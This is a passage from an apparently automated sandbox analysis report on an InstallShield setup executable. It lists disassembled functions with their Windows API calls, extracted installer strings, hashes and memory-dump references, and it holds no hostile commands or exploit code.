                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: HsG$HsG$HsG$HsG$\
                                                                                                                                                                          • API String ID: 2425351278-2706874849
                                                                                                                                                                          • Opcode ID: 729f00e43b9c1a2af195ea5fc9a494f846da580c8a4c56f550e058efd4d815ca
                                                                                                                                                                          • Instruction ID: ec87e5070c23eebbc6ec2389c2a0a8d0dcfe49f27a9ccd208546f364f4df5c84
                                                                                                                                                                          • Opcode Fuzzy Hash: 729f00e43b9c1a2af195ea5fc9a494f846da580c8a4c56f550e058efd4d815ca
                                                                                                                                                                          • Instruction Fuzzy Hash: D9F13A70508380DFD720DF24C948B9BBBE4FF88318F50892EE599972A1DB75A948CF56
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00404800, Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 250COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040486B
                                                                                                                                                                          • SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 004048D4
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004048F4
                                                                                                                                                                          • SetLastError.KERNEL32(HsG), ref: 00404931
                                                                                                                                                                          • GetLastError.KERNEL32(?,000000FF,00000001), ref: 004049AC
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004049C6
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004049D9
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00404A12
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,000000FF,?,?,000000FF,?,000000FF,00000001), ref: 00404A72
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00404A8C
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00404A9F
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00404AD8
                                                                                                                                                                          • GetLastError.KERNEL32(?,000000FF,00000001), ref: 00404AEB
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00404B42
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00404B57
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00404B6B
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00404B78
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00404B9C
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00404BAF
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00404BC3
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00404BD0
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00404BF4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: HsG$HsG$HsG$HsG$HsG
                                                                                                                                                                          • API String ID: 2425351278-1357387729
                                                                                                                                                                          • Opcode ID: 31b674690df0bfdb77382b9ac2b80e54cabc72a7151dde09f842773195b29553
                                                                                                                                                                          • Instruction ID: 43411a695ce25f9adaacc8678dd8dcf643a664dc996b6a5942799087e16fdfae
                                                                                                                                                                          • Opcode Fuzzy Hash: 31b674690df0bfdb77382b9ac2b80e54cabc72a7151dde09f842773195b29553
                                                                                                                                                                          • Instruction Fuzzy Hash: 3EB1F9B15083809FD720DF28C944B5BBBE4BF89318F11892DE598972A1DB75E849CF86
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00402970, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 289COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(CC858012), ref: 004029C4
                                                                                                                                                                          • SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402A20
                                                                                                                                                                          • GetLastError.KERNEL32(?), ref: 00402A68
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402A80
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000007), ref: 00402A8B
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00402AAB
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,?), ref: 00402B36
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402B4C
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000007), ref: 00402B57
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00402B77
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,000000FF,?,00000000), ref: 00402BC3
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402BD9
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000007), ref: 00402BE4
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00402C04
                                                                                                                                                                          • GetLastError.KERNEL32(?), ref: 00402C23
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402C39
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000007), ref: 00402C44
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00402C64
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402C76
                                                                                                                                                                          • SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00402CC4
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402CD1
                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00402CE7
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402CF2
                                                                                                                                                                          • SetLastError.KERNEL32(0047C4E4), ref: 00402D12
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: HsG$HsG
                                                                                                                                                                          • API String ID: 2425351278-815662401
                                                                                                                                                                          • Opcode ID: 3cb5351838574a6b86b4c2eae20592e0e1b5887f2882d5cc0032455ab3e36305
                                                                                                                                                                          • Instruction ID: 4e7e6d4c3d05729767b160986159ec47f1f64eff1442a30219f063f4109c43c1
                                                                                                                                                                          • Opcode Fuzzy Hash: 3cb5351838574a6b86b4c2eae20592e0e1b5887f2882d5cc0032455ab3e36305
                                                                                                                                                                          • Instruction Fuzzy Hash: EBC1F371D00258DFDB11DFA5CE48B9EBBB5BF04308F24812AE815B72A1D779A905CF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041B379, Relevance: 37.1, APIs: 12, Strings: 9, Instructions: 362stringregistryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041B383
                                                                                                                                                                            • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,auto,?,?,00000001,000005E8,0041CB09,?,?), ref: 0041B3D1
                                                                                                                                                                          • CharNextW.USER32(?,/auto,00000000,00000000), ref: 0041B4E8
                                                                                                                                                                          • lstrlenW.KERNEL32(?,0000000C,?,00000001,00000000,?,00000001), ref: 0041B524
                                                                                                                                                                          • CharNextW.USER32(?,00000001,?,00000001), ref: 0041B5A8
                                                                                                                                                                          • CharNextW.USER32(?,eprq), ref: 0041B6F6
                                                                                                                                                                          • lstrcmpW.KERNEL32(00000000,%IS_E%), ref: 0041B704
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 0041B715
                                                                                                                                                                          • _memset.LIBCMT ref: 0041B76C
                                                                                                                                                                          • lstrcpyW.KERNEL32 ref: 0041B7A4
                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,00000000), ref: 0041B7B1
                                                                                                                                                                          Strings
                                                                                                                                                                          • embed{, xrefs: 0041B5C2
                                                                                                                                                                          • /auto, xrefs: 0041B3E3
                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 0041B73B
                                                                                                                                                                          • |LJ, xrefs: 0041B7E9
                                                                                                                                                                          • debuglog, xrefs: 0041B549
                                                                                                                                                                          • eprq, xrefs: 0041B6DD
                                                                                                                                                                          • This setup was created with an EVALUATION VERSION of %s, which does not support extraction of the internal MSI file. The full ver, xrefs: 0041B420
                                                                                                                                                                          • auto, xrefs: 0041B3CB
                                                                                                                                                                          • %IS_E%, xrefs: 0041B6FE
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CharNext$lstrcpy$DeleteH_prolog3H_prolog3_Value_memsetlstrcmplstrcmpilstrlen
                                                                                                                                                                          • String ID: This setup was created with an EVALUATION VERSION of %s, which does not support extraction of the internal MSI file. The full ver$%IS_E%$/auto$Software\Microsoft\Windows\CurrentVersion$auto$debuglog$embed{$eprq$|LJ
                                                                                                                                                                          • API String ID: 1541416560-2282500369
                                                                                                                                                                          • Opcode ID: afb3353eed1acb643996f9750557fa778983704dc56765bf2de2cf93d1639b2d
                                                                                                                                                                          • Instruction ID: 806b597395e447c8a26e7fde34d18a1825895410f20daf3bb73b14d1d1f4c0b5
                                                                                                                                                                          • Opcode Fuzzy Hash: afb3353eed1acb643996f9750557fa778983704dc56765bf2de2cf93d1639b2d
                                                                                                                                                                          • Instruction Fuzzy Hash: CAE18A70940658AEDB24EB60CC95BEEB778AB15304F0040EBF10AB61D2DB785F85CF99
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00403960, Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004039C7
                                                                                                                                                                          • SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00403A2A
                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,000000FF,?,00000000,?,?), ref: 00403AB2
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403ACC
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403ADC
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00403B06
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00403B21
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403B35
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403B42
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00403B66
                                                                                                                                                                            • Part of subcall function 004038A0: GetLastError.KERNEL32(CC858012,?,?,?,?,00471888,000000FF,HsG,004043F6,?,00000001,000000FF), ref: 004038DE
                                                                                                                                                                            • Part of subcall function 004038A0: SetLastError.KERNEL32(00477348,00000000,?,00000000), ref: 0040393A
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,000000FF,00000000,00000001,00000000), ref: 00403BA5
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403BB9
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403BC6
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00403BEA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00403BFD
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403C11
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00403C1E
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00403C42
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FreeString
                                                                                                                                                                          • String ID: HsG$HsG$HsG
                                                                                                                                                                          • API String ID: 2425351278-1884270464
                                                                                                                                                                          • Opcode ID: 065b030965c8c512198ffaff1b0837ef59c33ff7a757d1bddf4dfa190833e556
                                                                                                                                                                          • Instruction ID: 61f50d9a5d29d22a2ae874efae0c14e9b8f9d4884cce7288c507bc871faf6d54
                                                                                                                                                                          • Opcode Fuzzy Hash: 065b030965c8c512198ffaff1b0837ef59c33ff7a757d1bddf4dfa190833e556
                                                                                                                                                                          • Instruction Fuzzy Hash: 139112715083809FE720DF29C949B5BBBE5BF84318F10492DF598972A1D77AE908CF46
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00401670, Relevance: 33.5, APIs: 14, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401737
                                                                                                                                                                          • SetLastError.KERNEL32(HsG), ref: 00401775
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000104), ref: 004017F5
                                                                                                                                                                          • SetLastError.KERNEL32(HsG), ref: 00401842
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,00000104), ref: 0040187B
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$FileModuleName
                                                                                                                                                                          • String ID: HsG$HsG$InstallShield.log$SOFTWARE\InstallShield\24.0\Professional$VerboseLogPath
                                                                                                                                                                          • API String ID: 1026760046-381609384
                                                                                                                                                                          • Opcode ID: f2aa9b82eb1b4ee12e7c254938b02230f88934128d610e703d129273266f9f32
                                                                                                                                                                          • Instruction ID: ef394eff209162cae146bd54ebdee3494f6fdb9940455087e46632806af88f6d
                                                                                                                                                                          • Opcode Fuzzy Hash: f2aa9b82eb1b4ee12e7c254938b02230f88934128d610e703d129273266f9f32
                                                                                                                                                                          • Instruction Fuzzy Hash: 5FA13C71108380DFD720DF65C845B9ABBE4BF94308F00492EF599972A1DBB99548CF5A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00428474, Relevance: 29.9, APIs: 7, Strings: 10, Instructions: 161COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042847E
                                                                                                                                                                          • _memset.LIBCMT ref: 004284B1
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                          • wsprintfW.USER32 ref: 0042856D
                                                                                                                                                                            • Part of subcall function 00436D0C: __EH_prolog3_GS.LIBCMT ref: 00436D13
                                                                                                                                                                          • wsprintfW.USER32 ref: 004285A4
                                                                                                                                                                          • wsprintfW.USER32 ref: 004285B7
                                                                                                                                                                          • _memset.LIBCMT ref: 0042868D
                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004286C4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wsprintf$ErrorH_prolog3_Last_memset$CurrentDirectory
                                                                                                                                                                          • String ID: "%s" /c:"msiinst /delayrebootq"$"%s" /q$"%s" /quiet /norestart$/c:"msiinst /delayrebootq"$/quiet /norestart$2.0.2600.0$InstallerLocation$Installing MSI engine %s$Software\Microsoft\Windows\CurrentVersion\Installer$msiaction.cpp
                                                                                                                                                                          • API String ID: 3028750256-818091861
                                                                                                                                                                          • Opcode ID: 7283156bc4cea5bf9f6a78ad46acdde11de552acf6c91dc0766c5aa04e962f9f
                                                                                                                                                                          • Instruction ID: b87da61650dc03525153287c8d68d1589f929bd48d9a8265480beaed98cc750b
                                                                                                                                                                          • Opcode Fuzzy Hash: 7283156bc4cea5bf9f6a78ad46acdde11de552acf6c91dc0766c5aa04e962f9f
                                                                                                                                                                          • Instruction Fuzzy Hash: 1451B8B1900228ABDB14DB54DC49BDD73B8AF15305F4041EFA609A7192DF785E84CB5D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041E990, Relevance: 28.7, APIs: 19, Instructions: 194windowCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041E99A
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0041E9C2
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0041E9DD
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0041E9F5
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 0041EA00
                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 0041EA0F
                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 0041EA24
                                                                                                                                                                          • GetDlgItem.USER32 ref: 0041EA35
                                                                                                                                                                          • SetWindowLongW.USER32 ref: 0041EA45
                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,?), ref: 0041EA94
                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,?), ref: 0041EAAC
                                                                                                                                                                          • SendMessageW.USER32(?,0000014E), ref: 0041EAD1
                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0041EB1C
                                                                                                                                                                          • SetDlgItemTextW.USER32 ref: 0041EB4A
                                                                                                                                                                          • SetDlgItemTextW.USER32 ref: 0041EB8D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Item$DialogLongTextWindow$H_prolog3_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3382325393-0
                                                                                                                                                                          • Opcode ID: 70bd93b9d5c8cbad8a66018e73defe87b0944515018ed1f663ab95935f60376f
                                                                                                                                                                          • Instruction ID: d60a3da391b37610b9fc285d2f382dd35ab929b5ffd2936a3739ea7f905bc18d
                                                                                                                                                                          • Opcode Fuzzy Hash: 70bd93b9d5c8cbad8a66018e73defe87b0944515018ed1f663ab95935f60376f
                                                                                                                                                                          • Instruction Fuzzy Hash: 47716F71900218AFDB14DF65CC45BEAB779BB04710F00459AF55AB71D1D7B4AAC0CF68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00440126, Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 151stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$lstrcpywsprintf$AllocHeap_free_malloc_memmove
                                                                                                                                                                          • String ID: %s,%u$%u.%u.%u.%u$\VarFileInfo\Translation
                                                                                                                                                                          • API String ID: 2339561013-1385173819
                                                                                                                                                                          • Opcode ID: 44437927b4414b13c61deba6bafb27dceb7df8f9864524895b966f48b1824017
                                                                                                                                                                          • Instruction ID: e5fa1ed359fb1c2e38ed63969b26add8f0f09f5b617874bbc9721daa69c837fd
                                                                                                                                                                          • Opcode Fuzzy Hash: 44437927b4414b13c61deba6bafb27dceb7df8f9864524895b966f48b1824017
                                                                                                                                                                          • Instruction Fuzzy Hash: C25186719002186BD721AB55CC49FAF77BCEF44705F1100DAFA0CE2151D6789E90CFA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004296E7, Relevance: 28.1, APIs: 6, Strings: 10, Instructions: 118COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
